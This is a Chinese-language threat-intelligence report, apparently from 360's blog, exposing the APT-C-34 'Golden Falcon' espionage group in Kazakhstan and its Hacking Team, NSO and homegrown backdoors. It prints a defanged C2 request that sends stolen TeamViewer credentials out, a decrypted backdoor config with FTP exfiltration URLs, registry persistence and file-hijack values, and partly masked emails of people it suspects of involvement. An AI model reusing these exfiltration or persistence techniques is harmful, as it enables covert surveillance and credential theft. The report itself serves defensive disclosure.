# 盘旋在中亚上空的阴影-⻩⾦雕(APT-C-34)组织攻击活动揭 露 - 360 核⼼安全技术博客 **blogs.360.cn/post/APT-C-34_Golden_Falcon.html** # 背景 Hacking Team是为数不多的⼏家在全世界范围出售商业⽹络武器的公司之⼀。2015年7⽉5⽇, Hacking Team遭遇了⼤型数据攻击泄漏事件,该公司已经⼯程化的漏洞和后⻔产品代码⼏乎被全 部公开。该事件泄露包括了Flash、Windows字体、IE、Chrome、Word、PPT、Excel、Android的 未公开0day漏洞,覆盖了⼤部分的桌⾯电脑和超过⼀半的智能⼿机。泄露的⽹络武器被⿊客⼤肆利 ⽤,随后Hacking Team公司也宣布破产被并购。2015年后,有关HackingTeam的活动突然销声匿 迹。 2018年在乌俄两国突发“刻⾚海峡”事件的危机时刻,360⾼级威胁应对团队在全球范围内率先发现 了⼀起针对俄罗斯的APT攻击⾏动,攻击者精⼼准备了⼀份俄⽂内容的员⼯问卷的诱饵⽂档,根据 ⽂档内容推测,攻击所指向的是俄罗斯总统办公室所属的医疗机构,结合被攻击⽬标医疗机构的职 能特⾊,我们将APT攻击命名为了“毒针”⾏动。我们⽆法确定“毒针”⾏动的动机和攻击身份,但攻 击所指向的医疗机构特殊背景,使攻击表现出了明确的定向性,同时攻击发⽣在“刻⾚海峡”危机的 敏感时段,也为攻击带上了⼀些未知的政治意图。 我们发现“毒针”⾏动使⽤了Flash 0day漏洞CVE-2018-15982 ,后⻔程序疑似⾃于意⼤利⽹络武器 军⽕商HackingTeam,所以不难推测其背后的APT组织可能经常采购商业⽹络武器。种种迹象表明 HackingTeam的⽣意并没有消失,这引发了我们对HackingTeam⽹络武器再次追踪的兴趣,我们尝 试针对HackingTeam⽹络武器进⾏关联追踪,意料之外地发现了⼀⽀未被披露过的俄语系APT组 织,该组织的活动主要影响中亚地区,⼤部分集中在哈萨克坦国境内。因为是全球⾸次发现披露, 我们参照中亚地区擅⻓驯养猎鹰进⾏狩猎的习俗特性,将该组织命名为⻩⾦雕(APT-C-34)。 # 概要 在针对HackingTeam后⻔程序研究过程中,我们从360的⼤数据中找到了更多的在野攻击中使⽤的 HackingTeam后⻔程序,通过对程序的同源性进⾏分析,关联扩展发现了⼤量不同种类的后⻔程 序。通过持续⼀年的观察和⼀步⼀步的深⼊调查分析,我们挖掘了更多的细节信息,逐渐整合形成 了⻩⾦雕(APT-C-34)组织的全貌 ⻩⾦雕(APT-C-34)组织的受害者⼴泛分布中亚地区,主要活跃在哈萨克斯坦国境内,涉及各⾏ 各业,包括教育、航空航天、政府机关、媒体⼯作⼈员等,其中部分受害者有中国背景,涉及我⽅ 与哈萨克合作项⽬,⽽极少数的⼈位于⻄北部地区。该组织背后疑似有政府实体机构⽀持其⾏动。 在技术⼿段上,除了传统的后⻔程序,⻩⾦雕(APT-C-34)组织还采购了HackingTeam和NSO的 商业间谍软件。我们发现该组织的HackingTeam 后⻔版本号为10.3.0,与“毒针”⾏动的后⻔版本号 相同。在攻击⽅式上,除了使⽤了传统的社会⼯程学等⼿段外,该组织也⼤量使⽤了物理接触的⽅ 式投递恶意程序(例如U盘等);除此之外,其也有使⽤特殊侦查设备对⽬标直接进⾏窃听和信号 获取的迹象。 # 攻击影响范围 ----- 对受害者进⾏分析统计,绝⼤部分受害者都集中在哈萨克斯坦国境内,涉及各⾏各业,从相关数据 中看,包括教育⾏业、政府机关⼈员、科研⼈员、媒体⼯作⼈员、部分商务⼯业、军⽅⼈员、宗教 ⼈员、政府异⻅⼈⼠和外交⼈员。 波及我国的主要⼈员绝⼤部分也集中在哈萨克斯坦国境内,包括留学⽣群体、驻哈萨克斯坦教育机 构、驻哈萨克斯坦相关⼯程项⽬组,极少数的受害者分布在我国⻄北部地区,涉及政府⼯作⼈员。 在该组织的C&C服务器上,我们发现了⼤量的根据哈萨克斯坦城市命名的⽂件夹,包含了⼤部分哈 萨克斯坦的主要城市。 #### ⽂件夹名称 城市名 Aktay 阿克套,位于哈萨克斯坦⻄部、⾥海东岸、曼格斯套州州政府, 哈萨克第六⼤城市 Karaganda 卡拉⽢达,卡拉⼲达地区的⾸府。它是哈萨克斯坦⼈⼝第四⼤城 市 Kokshetay 科克舍陶,哈萨克斯坦北部阿克莫拉地区的⾏政中⼼ Oral 乌拉尔,哈萨克斯坦⻄哈萨克斯坦州⾸府。位于该国⻄部乌拉尔 河畔。 Oskemen 厄斯克⻔,哈萨克斯坦东哈萨克斯坦州⾸府。位于乌尔巴河与额 尔⻬斯河汇合处。 Semey 塞⽶伊,东哈萨克斯坦地区和⻄伯利亚哈萨克斯坦部分与俄罗斯 接壤的城市。 атырау (Atyrau) 阿特劳,阿特劳州⾸府,位于欧洲和亚洲的界河乌拉尔河流⼊⾥ 海的河⼝上。 #### жезказган (Jezkazgan) Кызылорда (Kyzylorda) Петропавл (Petropavl) Талдыкорган (Taldykorgan) #### 杰兹卡兹⽢,哈萨克斯坦中部卡拉⼲达州的⼀个城市。 克孜勒奥尔达,克孜勒奥尔达州⾸府,位于锡尔河畔。 彼得罗巴甫尔,北哈萨克斯坦州⾸府,位于伊希姆河畔。 塔尔迪库尔⼲,阿拉⽊图州⾸府。 #### Тараз (Taraz) 塔拉兹,江布尔州⾸府。位于该国南部塔拉斯河畔,邻近吉尔吉 斯斯坦。 #### Шымкент (Shymkent) #### 奇姆肯特,直辖市,位于阿拉⽊图⻄690公⾥,是哈萨克斯坦共 和国第三⼤城市。 ----- 在对应的城市命名的⽂件夹下,有相关的HackingTeam后⻔程序,其使⽤后⻔程序时针对不同城市 的⽬标使⽤不同的配置。 该组织的后⻔程序会将收集的受害者信息加密后上传⾄C&C服务器,在服务器上每⼀个受害者的信 息都会⽤⼀个⽂件夹进⾏标识。如下图所示: ----- # 典型受害者分析 通过对上传⽂件进⾏解密,我们发现了⼤量该组织从受害者计算机上窃取的⽂档和数据。 典型的中国受害者,某驻哈教育机构的中⽅⼈员。 典型的哈萨克特斯坦科研机构受害者,被窃取的⽂件涉及了哈萨克斯坦与俄罗斯联合开发项 ⽬。 典型的哈萨克斯坦国教育和科研机构⼯会受害者,被窃取的⽂档包含会议记录 ----- # 主要攻击⽅式分析 我们发现⻩⾦雕(APT-C-34)组织除了常规的社会⼯程学攻击⼿段,也喜欢使⽤物理接触的⼿段 进⾏攻击,同时还采购了⽆线电硬件攻击设备。 ## 社会⼯程学攻击⽅式 该组织制作了⼤量的伪装的⽂档和图⽚⽂件作为⻥叉攻击的诱饵,这些⽂件通过伪装图标诱导⽤户 点击,这些⽂件实际上是EXE和SRC后缀的可执⾏⽂件,同时会释放弹出真正的⽂档和图⽚欺骗受 害者。 诱饵⽂档的内容五花⼋⻔,有华为路由器的说明书、伪造的简历和三星⼿机说明书等。 ----- ----- 其中部分诱饵程序安装包脚本会⾃动将程序添加到注册表项中,实现⾃启动驻留。 ## 物理接触攻击⽅式 ⻩⾦雕(APT-C-34)组织疑似喜欢使⽤U盘作为载体,通过物理接触⽬标的⽅式进⾏攻击,部分受 害者曾经接⼊过包含恶意程序和安装脚本的U盘。如下图所示,其中以install开头的bat⽂件为恶意 程序安装脚本。 同时也使⽤了HackingTeam的物理攻击套件,该套件需要通过恶意硬件物理接触⽬标机器,在系统 引导启动前根据系统类型植⼊恶意程序,⽀持Win、Mac和Linux平台。 ----- ## ⽆线电监听攻击⽅式 该组织采购了⼀家俄罗斯公司“YURION”的硬件设备产品,该公司是⼀家俄罗斯的安全防务公司, 专⻔出售⽆线电监听、窃听等设备,该组织有可能使⽤该公司的⼀些特殊硬件设备直接对⽬标的通 讯等信号进⾏截取监听。 # 核⼼后⻔程序分析 本节将对⻩⾦雕(APT-C-34)组织所使⽤的后⻔程序进⾏详细的分析,该组织的后⻔技术主要通 过改造正规软件、⾃主研发和采购商业⽊⻢这三种⽅式进⾏。 ## 正规远程控制软件改造 针对该组织恶意软件的相关分析中,我们发现了该组织改造正规的远程协助软件进⾏攻击,通过劫 持后者实现对受害者的控制。 ### TeamViewer Hijacker 该组织通过DLL劫持改造的TeamViewer QuickSupport软件,当恶意DLL加载后会进⾏系统API Hook,进⽽隐藏正常的程序窗⼝,并将ID和Password发送到C&C服务器。 正常的TeamViewer QuickSupport由主程序、Teamviewer_Resource_fr.dll和tv.dll三个⽂件构成, 该组织加⼊了⼀个后⻔dll程序将该软件改造成后⻔。后⻔替换了原有的tv.dll⽂件,将原有的功能库 tv dll重信命名为userinit dll 同时伪造的tv dll与原模块具有相同的导出表结构 再通过加载 ----- userinit.dll来⽀持原有逻辑。 伪造的tv.dll通过Inline Hook API ShowWindow 使正常TeamViewer窗⼝隐藏,并Hook SetWindowTextW 获取ID和Password。 上图为正常的TeamViewer QuickSupport程序窗⼝,伪装DLL 通过Hook 系统API ShowWindow,并修改显示参数为 SW_HIDE进⽽实现主程序窗⼝隐藏。 通过Hook API SetWindowsTextW来获取TeamViewer的ID和Password 随后构造Get请求,将Id和Password上传到C&C: hxxp://.ru//get.php?=1&n=31337&u=7&id=xx&pwd=xx&m=d4628443 ----- 另⼀⽅⾯,恶意程序会在⽬录下寻找名为msmm.exe和msmn.exe的⽂件,如果存在则通过 WinExec执⾏,其主要功能为键盘记录和剪切板内容窃取。 查找名为 MSM?.DLL 的DLL⽂件,如果存在则会加载该DLL,执⾏Init导出函数,该DLL的功能也 为键盘和剪切板记录。 值得注意的是,在伪装的DLL中,后部分代码使⽤了虚拟机进⾏保护,解析执⾏Bytecode。 ### RMS Hijacker 另⼀款改造后⻔通过劫持俄罗斯常⽤的远程控制软件RMS,实现对⽬标机器的控制。其功能与 TeamViewer Hijacker相似。 ----- ### ⾃主研发Harpoon (Гарпун)后⻔ Haroon是⻩⾦雕(APT-C-34)组织⾃主研发的⼀款针对特定⽤户的后⻔程序,使⽤Delphi实现。 我们获取了该后⻔的说明⼿册(如下图),该后⻔具备强⼤的信息收集功能,包括屏幕定时截图、 录⾳、剪切板记录、键盘记录、特定后缀名⽂件偷取等功能。 以下是上述字段的中⽂翻译: 主要功能: STS Harpoon程序提供以下功能: 键盘记录; 剪切板记录; 以预定的时间间隔获取⽬标计算机桌⾯上活动窗⼝截图; 列出对象计算机硬盘上给定⽬录的内容; 获取Skype登录名、联系⼈列表和聊天消息; 获取Skype和Google Hangouts通话对象和语⾳记录; 从⻨克⻛录制声⾳,窃听; 从⽬标计算机复制指定的⽂件; 从对象计算机的可移动介质中⾃动复制⽂档⽂件; 将所有截获和复制的信息打包到加密的dat⽂件中,然后将它们保存到指定的⽬录中; 将获取的信息发送到指定的FTP; 运⾏程序或操作系统命令; 从给定的FTP上下载⽂件并将它们释放到指定⽬录中; 远程重新配置和更新组件; 接收来⾃给定FTP的信息,⾃动将⽂件解压缩到指定⽬录; ⾃毁; ----- 该后⻔收集的信息被加密上传到指定的FTP服务器上,相关收集信息在加密的配置⽂件中,解密后 的内容格式如下: #### - BackupEnable=Yes BInterval=10 Source=Folder URL=ftp://176.*.*.*/ User= RunProc=javaws.exe BPassword= ScreenShotsEnable=Yes Mode=2 SInterval=60 SCInterval=5 Width=800 Micro=Off Height=600 Quality=1 KeyLogsEnable=Yes RunProc=jucheck.exe ClipBoardLogsEnable=Yes RDGSize=1048576 UpgradeURL=ftp://176.*.*.* / RDGDays=180 SPassword= #### RDGExts=.xls .xlsx .doc .docx .jpg .bmp .pdf .ppt .pptx Log #### FilesNumber=999 LogFileSize=2 除上述信息收集功能外,其还具备Skype窃听功能,通过调⽤Skype的接⼝,实现Skype语⾳和聊 天记录的窃听。 ----- 键盘记录模块,通过SetWindowsHookEx函数设置窗⼝钩⼦来实现键盘记录,并将截取的键盘信息 发送到主程序创建的窗⼝。 ## 采购HackingTeam商业后⻔ 该组织购买了HackingTeam的远程控制软件Remote Control System(RCS),并有完整的控制端 软件,其版本号均为10以上,⽽HackingTeam在2015年泄露的RCS版本号为9.6。我们发现了该组 织使⽤的HackingTeam相关⽂件,包括Windows和Android 相应的客户端,以及rcs的控制端。 ----- ### Windows类型 Rcs的Windows客户端是外界公布的HackingTeam “Soldier”程序,其使⽤了VMP进⾏保护,并且使 ⽤了证书进⾏签名。功能上与⽼版本的HackingTeam 程序相似。 Windows端的C&C信息格式如 下: #### IP Country ASN *..* Germany 47447\23media_GmbH 与⽼版本的Hacking Team的程序相类似,其写⼊注册表项进⾏⾃启动,注册表位置为: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder 项名称为NVIDIAControlPanel 值得注意的是我们还发现了RCS⽊⻢离线安装包,将该安装包写⼊U盘等可引导介质中,当攻击者 物理接触到受害者电脑后,能够在系统启动阶段,神不知⻤不觉的将⽊⻢植⼊系统。 该离线安装包不仅⽀持Windows操作系统,⽽且还⽀持Mac OS和Linux系统。 该安装包的版本为10.3.0,远⾼于2015年泄漏的版本,该安装包能够⾃动识别操作系统的版本,机 器名,⽤户名等信息,使⽤界⾯极为简便。 ----- 在安装完成后,Hacking Team⽊⻢被安装到配置⽂件中指定的位置了。重启系统后,⽊⻢便开始 运⾏。 下图为Hacking Team离线安装配置⽂件: ⽊⻢在 HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加开机启动项,启动 %userprofile%\appdata\local\microsoft\⽂件夹下的InterMgr 0.17.stcz⽂件。⽊⻢在运⾏后会向其 他进程注⼊线程,以此来达到对抗分析的⽬的,下图为使⽤分析⼯具和Regedit查看启动项的对 ⽐。 ----- 如果只看0字节的InterMgr 0.17.stcz的⽂件可能会误导后⻔⽆法启动。 但实际结合注册表分析可以得知,⽊⻢ 是劫持了后缀为stcz⽂件的关联打开⽅ 式, HKEY_CLASSES_ROOT.sctz指 向了stcz_auto_file。 ⽽从HKEY_CLASSES_ROOT\stcz_auto_file\shell\open\command的值可以知道,InterMgr 0.17.stcz在开机时被打开后会调⽤rundll32,运⾏%userprofile%\AppData\Local\Microsoft\yFEO39g\⽬录下的⽊⻢dCh8RnL1.Odo。 该处注册表值如下: %systemroot%\system32\rundll32.exe" %windir%..\Users\ADMINI~1\AppData\Local\MICROS~1\yFEO39g\dCh8RnL1.ODo",fe566ba28K ### Android类型 HackingTeam Android 恶意程序中总共使⽤了17个模块,下⾯列出各个模块的功能 #### 模块名 功能 #### Module‐ Applica‐ tion Module‐ Calen‐ dar #### 记录受感染设备上启动和停⽌的所有进程名称和信息。 记录受感染设备⽇历中找到的所有信息。 ----- #### 模块名 功能 #### Module‐ Call Module‐ Camera Module‐ Chat Module‐ Clip‐ board Module‐ Crisis Module‐ Device Module‐ Mes‐ sage Module‐ Mic Module‐ MicL Module‐ Pass‐ word Module‐ Photo Module‐ Position Module‐ Snap‐ shot Module‐ Url Agent‐ Ad‐ dress‐ book #### 捕获被感染⽬标设备拨打和接收的所有呼叫的⾳频和信息。 使⽤受感染设备前后摄像头拍摄照⽚。 获取受感染设备上流⾏IM应⽤的聊天记录(包括Facebook Messenger, WhatsApp, Skype, Viber, Line, WeChat, Telegram, BlackBerry Messenger)。 获取受感染⽬标设备剪贴板的内容。 识别受感染⽬标设备上的危险情况,可以暂时禁⽤⼀些恶意操作。 记录受感染设备的系统信息 记录受感染设备接收和发送的所有邮件、短信和彩信。 记录受感染设备⻨克⻛周围声⾳。 实时收听受感染设备正在进⾏的对话。 记录保存在受感染设备应⽤程序中的所有密码(例如浏览器、WIFI密码、即 时通讯⼯具和⽹络邮件服务)。 获取受感染设备中外部存储中所有图像类型⽂件数据。 记录受感染设备的地理位置。 捕获受感染设备屏幕图像。 记录受感染设备浏览器访问的URL。 记录受感染设备通讯录中所有信息。 ----- 使⽤Framaroot⼯具进⾏提权操作,exploit⽂件被加密存储在assets/lb.data。 Android端的C&C信息如下: #### IP Country ASN 185....* Germany 47447\23media_GmbH 185. ...* United States 14576\Hosting_Solution_Ltd. 185. ...* Netherlands 14576\Hosting_Solution_Ltd. 94....* Sweden 52173\Sia_Nano_IT 其中C&C地址 185. ..* 与Windows端共⽤。 # 关联和归属分析 ⻩⾦雕(APT-C-34)组织的基础设施和绝⼤部分的受害者均集中在哈萨克斯坦国境内,根据受害 者的数据推测,该组织的⼤部分攻击⾏动主要是针对哈萨克斯坦国境内的情报收集任务,其中也波 及到了我国驻哈萨克斯坦境内的机构和⼈员,⽀持该组织背后的实体机构疑似与哈萨克斯坦国政府 机构存在关联。 ## 与毒针⾏动的关联 ⻩⾦雕(APT-C-34)组织和“毒针”⾏动背后的APT组织同属于俄语系的APT组织,⽬前我们没有发 现特别的关联,它们可能分别属于不同的APT组织,它们疑似都在同⼀时期采购了相同版本的 HackingTeam⽹络武器。 公开情报显示, HackingTeam 的windows类型后⻔的10.3.0版本会伪装为 NVIDIA Control Panel Application 和 MS One Drive程序进⾏攻击,“毒针”⾏动使⽤的HackingTeam后⻔正是10.3.0版本。 ⽽⻩⾦雕(APT-C-34)组织拥有的HackingTeam程序也是同⼀批次的10.3.0版本。 ----- ## 哈萨克斯坦与HackingTeam 2015年,HackingTeam被攻击泄露数据后,哈萨克斯坦的国家情报机关被证实采购了 HackingTeam的软件,曾与HackingTeam官⽅来往邮件寻求⽹络武器的技术⽀持。 从邮件内容看,其中涉及了后⻔程序因被360杀毒软件查杀⽽导致⽬标不上线的案例,疑似是针对 中国的攻击: ----- . ## APT-C-34组织与⽹络军⽕商 ⻩⾦雕(APT-C-34)组织不仅采购了HackingTeam的⽹络武器,同时也是著名的移动⼿机⽹络军 ⽕商 NSO Group的客户。在⻩⾦雕(APT-C-34)的基础设施中,我们还发现了NSO最出名的⽹络 武器pegasus的培训⽂档,其中还包括与NSO相关的合同信息,采购时间疑似在2018年。依靠 pegasus⽹络武器,⻩⾦雕(APT-C-34)组织应该具备针对Iphone、Android等移动设备使⽤0day 漏洞的⾼级⼊侵能⼒。 ## APT-C-34组织的技术⽂档 ----- 我们获取到了该组织核⼼后⻔程序Harpoon的技术说明⽂档,该⼯具被命名为 Гарпун(Harpoon),中⽂实际含义是⻥叉,后⻔的版本号为5.0。该⽂档的内容⼤量引⽤标注了 哈萨克斯坦城市名和哈萨克斯坦政府机构名,疑似该后⻔程序是由哈萨克斯坦的政府机构⽀持开 发。 ## 关联⼈物信息 ⻩⾦雕(APT-C-34)组织的部分的恶意程序签注了合法的数字签名,我们捕获到的签名如下: #### 姓名 邮箱 证书 MD5 ⽬前是否有效 Evn Bi*kyy Ev**n.bi***kyy@mail.ru bca12d6**45d7bac4* 否 Ir Kan **an_i**r@mail.ru 5ab70b9**4627f11d* 否 Yuin Og Vlad**ich O**1975@bk.ru 6fc0776e**ce7463* 是 Ir Kan X**n_i**r@mail.ru ce5b576**d65290* 否 A***a Ltd a95af43**c6bbce* 否 通过邮箱信息我们关联到了俄语系⼈物的linkedin身份信息,该⼈物疑似为⻩⾦雕(APT-C-34)组 织的技术⼯程师。 ----- # 总结 ⾄此,360⾼级威胁应对团队通过关联Hacking Team武器,发现了⼀⽀活跃在中亚地区,从未被外 界知晓的APT组织⻩⾦雕(APT-C-34)。其间感谢兄弟团队360烽⽕实验室协助分析了移动部分⽹ 络武器。通过我们的报告可以发现,⻩⾦雕(APT-C-34)组织背后的实体机构投⼊了⼤量的⼈ ⼒、物⼒和财⼒⽀持其运作,不光⾃⼰研发还采购了⼤量的⽹络军⽕武器,种种迹象表明这都不是 个⼈或⼀般组织能够做到的,这是⼀⽀具有⾼度组织化、专业化的⽹军⼒量。同时通过我们的披 露,⼤家可以注意到⽹络武器军⽕商脚步也从未停歇,⽹络军⽕的交易仍然如⽕如荼,⽹络武器⽇ 益受到各国的重视,全球各国都会⾯临巨⼤的安全威胁。 -----